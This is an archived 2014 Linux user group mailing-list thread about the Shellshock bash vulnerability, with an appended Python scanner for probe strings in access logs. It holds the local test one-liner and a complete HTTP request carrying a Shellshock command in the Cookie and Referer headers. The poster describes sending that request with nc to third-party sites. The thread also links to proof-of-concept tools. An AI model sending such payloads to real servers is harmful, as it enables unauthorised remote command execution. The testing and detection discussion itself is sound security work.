From eli at billauer.co.il Sun Sep 7 18:35:33 2014
From: eli at billauer.co.il (Eli Billauer)
Date: Sun, 07 Sep 2014 18:35:33 +0300
Subject: [Haifux] Haifux: Call for speakers
Message-ID: <540C7B45.2040605@billauer.co.il>

Hi all,

After a short August vacation, Haifux is back. And it seems like it's some kind of tradition that the lecture list is empty at this time of the year.

So, any takers? The next slot -- a week from now -- is vacant. Grab it while it's hot!

Remember that you don't have to be an expert in the field of your lecture, even though many are. Haifux is also a good place to test-run talks intended for less responsive audiences.

See you,
Eli

--
Web: http://www.billauer.co.il

From eli at billauer.co.il Fri Sep 26 12:30:36 2014
From: eli at billauer.co.il (Eli Billauer)
Date: Fri, 26 Sep 2014 12:30:36 +0300
Subject: [Haifux] The Bash vulnerability (shellshock)
Message-ID: <5425323C.9020304@billauer.co.il>

Hi everyone,

Happy new year!

To make it even merrier, it seems like a rather widespread vulnerability, based upon a bug in Bash (!) has been discovered:

http://www.engadget.com/2014/09/25/what-is-the-shellshock/

Or for short, type this on your bash console and see if you're cooked:

env x='() { :;}; echo vulnerable' bash -c 'echo This is a test'

If it says "vulnerable" before "This is a test", welcome to the club. Odds are it will.

So the idea is that you can execute an arbitrary command on a remote computer, if you can add an environment variable, and kick off a bash shell with it. Word has it, that since the HTTP headers are passed to any CGI script as environment variables (by Apache, for example), it's possible to use the Referer or Cookie headers for this purpose.

So I tried this on a couple of sites (addresses mangled):

GET / HTTP/1.1
Host: thesite.com
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux i686 (x86_64)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Cookie: () { :; }; ping -c 3 93.1.9.2
Referer: () { :; }; ping -c 3 93.1.9.2

and then went

nc thesite.com 80 < therequest.txt

This was supposed to trigger a ping in my direction, but it didn't. Instead, I found the full Referer string in the access log. Apparently, it didn't work on my first go.

Insights, anyone? Does it mean that the tested site is safe, despite the horror stories?

Regards,
Eli

--
Web: http://www.billauer.co.il

From guy.choo.keren at gmail.com Fri Sep 26 12:39:39 2014
From: guy.choo.keren at gmail.com (guy keren)
Date: Fri, 26 Sep 2014 12:39:39 +0300
Subject: [Haifux] The Bash vulnerability (shellshock)
In-Reply-To: <5425323C.9020304@billauer.co.il>
References: <5425323C.9020304@billauer.co.il>
Message-ID: <5425345B.1090204@gmail.com>

On 09/26/2014 12:30 PM, Eli Billauer wrote:
> env x='() { :;}; echo vulnerable' bash -c 'echo This is a test'

you're too late - there's a (partial?) fix being distributed around...

--guy

From shacharr at gmail.com Fri Sep 26 14:25:30 2014
From: shacharr at gmail.com (Shachar Raindel)
Date: Fri, 26 Sep 2014 14:25:30 +0300
Subject: [Haifux] The Bash vulnerability (shellshock)
In-Reply-To: <5425345B.1090204@gmail.com>
References: <5425323C.9020304@billauer.co.il> <5425345B.1090204@gmail.com>
Message-ID:

On Sep 26, 2014 12:49 PM, "guy keren" wrote:
>
> On 09/26/2014 12:30 PM, Eli Billauer wrote:
>>
>> env x='() { :;}; echo vulnerable' bash -c 'echo This is a test'
>
> you're too late - there's a (partial?) fix being distributed around...
>

For your moment of optimism: http://istheinternetonfire.com

We haven't had this much fun since the sendmail days...

--Shachar

From eli at billauer.co.il Fri Sep 26 14:33:31 2014
From: eli at billauer.co.il (Eli Billauer)
Date: Fri, 26 Sep 2014 14:33:31 +0300
Subject: [Haifux] The Bash vulnerability (shellshock)
In-Reply-To: <5425345B.1090204@gmail.com>
References: <5425323C.9020304@billauer.co.il> <5425345B.1090204@gmail.com>
Message-ID: <54254F0B.5090209@billauer.co.il>

Hi,

I did

# yum upgrade bash

on Haifux' server, and it's off the hook. But I was also surprised that the attack failed even before that.

Eli

--
Web: http://www.billauer.co.il

From boaz.gezer at gmail.com Sat Sep 27 11:36:14 2014
From: boaz.gezer at gmail.com (boazg)
Date: Sat, 27 Sep 2014 11:36:14 +0300
Subject: [Haifux] The Bash vulnerability (shellshock)
In-Reply-To: <54254F0B.5090209@billauer.co.il>
References: <5425323C.9020304@billauer.co.il> <5425345B.1090204@gmail.com> <54254F0B.5090209@billauer.co.il>
Message-ID:

you need to find a vulnerable site. CGI doesn't have to pass through bash. you need a site that opens a subshell for something. they aren't uncommon, but it's not every linux-CGI site.

From boaz.gezer at gmail.com Sat Sep 27 11:37:45 2014
From: boaz.gezer at gmail.com (boazg)
Date: Sat, 27 Sep 2014 11:37:45 +0300
Subject: [Haifux] The Bash vulnerability (shellshock)
In-Reply-To:
References: <5425323C.9020304@billauer.co.il> <5425345B.1090204@gmail.com> <54254F0B.5090209@billauer.co.il>
Message-ID:

try it with DHCP instead

https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/

From guy at pclabs.co.il Sat Sep 27 22:42:58 2014
From: guy at pclabs.co.il (Guy Edri)
Date: Sat, 27 Sep 2014 22:42:58 +0300
Subject: [Haifux] The Bash vulnerability (shellshock)
In-Reply-To:
References: <5425323C.9020304@billauer.co.il> <5425345B.1090204@gmail.com> <54254F0B.5090209@billauer.co.il>
Message-ID:

Hey Eli.

http://www.tripwire.com/state-of-security/off-topic/shell-shocked-bash-bug-detection-tools-cve-2014-6271/

http://shellshocktest.com/

https://github.com/mubix/shellshocker-pocs

enjoy your PT with all those tools.

From eli at billauer.co.il Sun Sep 28 18:12:54 2014
From: eli at billauer.co.il (Eli Billauer)
Date: Sun, 28 Sep 2014 18:12:54 +0300
Subject: [Haifux] The Bash vulnerability (shellshock)
In-Reply-To:
References: <5425323C.9020304@billauer.co.il> <5425345B.1090204@gmail.com> <54254F0B.5090209@billauer.co.il>
Message-ID: <54282576.8040005@billauer.co.il>

Thanks Guy.

I'll definitely try one of those test scripts. As for asking a random site to check this for me -- I'm not sure it's a good idea. I mean, I don't know who has set up this site and what their intentions are...

Regards,
Eli

--
Web: http://www.billauer.co.il
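
Added example, not part of any message in this thread: a scanner for the trace Eli describes in his first message, where the probe string turned up in the access log's Referer field. It assumes Apache's "combined" log format; the log lines, the addresses and the names `scan` and `SAMPLE_LOG` are constructed for illustration.

```python
import re

# Apache "combined" log format (assumed here):
# host ident user [time] "request" status bytes "referer" "user-agent"
QUOTED = r'"((?:[^"\\]|\\.)*)"'
COMBINED = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] ' + QUOTED + r' \d{3} \S+ ' + QUOTED + ' ' + QUOTED
)

# Unpatched bash treated an environment value as a function definition only
# when it began with "() {"; the pattern is slightly looser about whitespace.
FUNC_PREFIX = re.compile(r'^\s*\(\)\s*\{')

# Constructed sample lines (documentation addresses, harmless echo payload).
SAMPLE_LOG = [
    '192.0.2.10 - - [26/Sep/2014:12:31:02 +0300] "GET / HTTP/1.1" 200 5120 '
    '"http://example.org/" "Mozilla/5.0 (X11; Linux x86_64)"',
    '198.51.100.7 - - [26/Sep/2014:12:31:40 +0300] "GET / HTTP/1.1" 200 5120 '
    '"() { :;}; echo vulnerable" "Mozilla/5.0 (X11; Linux x86_64)"',
    '198.51.100.7 - - [26/Sep/2014:12:31:41 +0300] "GET /cgi-bin/status HTTP/1.1" 404 312 '
    '"-" "() { :; }; echo vulnerable"',
    '192.0.2.44 - - [26/Sep/2014:12:33:09 +0300] "GET /search HTTP/1.1" 200 880 '
    '"http://example.org/?q=() { x" "curl/7.38.0"',
    'truncated or non-combined line',
]

def scan(lines):
    """Return (hits, unparsed): hits are (line_no, host, field, value) tuples for
    Referer/User-Agent values shaped like a bash function definition."""
    hits, unparsed = [], []
    for line_no, line in enumerate(lines, 1):
        m = COMBINED.match(line)
        if m is None:
            unparsed.append(line_no)  # report rather than silently skip
            continue
        host, _request, referer, agent = m.groups()
        for field, value in (("referer", referer), ("user-agent", agent)):
            if FUNC_PREFIX.match(value):
                hits.append((line_no, host, field, value))
    return hits, unparsed

if __name__ == "__main__":
    hits, unparsed = scan(SAMPLE_LOG)
    for line_no, host, field, value in hits:
        print(f"line {line_no}: {host} sent {field} = {value!r}")
    if unparsed:
        print("could not parse lines:", unparsed)
```

A hit records that a probe arrived, not that anything ran: as boazg notes in the thread, the request has to reach bash for the header to matter. The combined format does not log the Cookie header, so probes sent only there will not appear.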